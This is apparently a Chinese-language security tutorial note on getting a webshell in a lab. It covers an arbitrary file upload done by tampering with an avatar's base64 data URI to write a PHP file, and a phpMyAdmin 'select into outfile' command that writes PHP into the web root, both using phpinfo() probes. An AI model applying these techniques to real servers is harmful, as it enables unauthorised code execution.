您的位置: 首页  >  文章  >  某教程学习笔记(一):19、任意文件上传和sql语句拿shell

某教程学习笔记(一):19、任意文件上传和sql语句拿shell

分类: 文章 2024-09-11 11:46:28

毕业时,门卫大爷收走了那辆自行车,问我都那么破了,还拍照干什么,他哪里知道后座上曾坐过陪了我四年的姑娘。。。

---- 网易云热评

一、任意上传文件拿shell

1、注册账号
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
2、上传头像
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
3、上传任意文件,抓包分析
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
将tx后面的内容修改为tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHANCiBwaHBpbmZvKCk7IA0KPz4%3D

解密收的内容为:data:image/php;base64,<?php phpinfo();?>,也就是上传一个文件内容为<?php phpinfo();?>的php文件

4、虽然提示报错,但是我们访问上传后的地址: http://192.168.171.128/uploadfile/member/3/0x0.php ,文件已生效
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
二、sql命令拿shell

1、进入phpmyadmin页面
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
2、输入一下sql语句并执行,生成一aiyou.php文件,内容为<?php phpinfo();?>
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
select “<?php phpinfo();?>” into outfile “C:/phpStudy/PHPTutorial/WWW/aiyou.php”

3、访问该文件 http://192.168.171.128/aiyou.php
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
禁止非法,后果自负
欢迎关注公众号:web安全工具库
某教程学习笔记(一):19、任意文件上传和sql语句拿shell

相关推荐